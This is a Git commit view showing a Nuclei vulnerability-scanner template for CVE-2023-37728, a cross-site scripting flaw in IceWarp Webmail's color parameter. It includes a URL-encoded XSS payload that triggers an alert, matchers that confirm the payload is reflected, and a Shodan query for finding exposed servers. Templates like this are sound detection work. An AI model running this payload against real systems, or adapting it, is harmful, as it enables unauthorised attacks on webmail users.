commit
2bca87e397
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2023-37728
|
||||
|
||||
info:
|
||||
name: IceWarp Webmail Server - Cross-Site Scripting
|
||||
author: technicaljunkie
|
||||
severity: medium
|
||||
description: |
|
||||
IceWarp Webmail Server contains a cross-site scripting vulnerability in the /webmail/ color parameter.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
|
||||
- https://medium.com/@ayush29/cve-2023-37728-6dfb7586311
|
||||
classification:
|
||||
cvss-metrics: CCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-37728
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: title:"icewarp"
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: cve,cve2023,xss,icewarp
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/webmail/?color=%22%3E%3Cimg%20src%20onerror=%22alert(document.domain)%22%3E%3C%22%27'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '><img src onerror="alert(document.domain)"><'
|
||||
- 'IceWarp'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue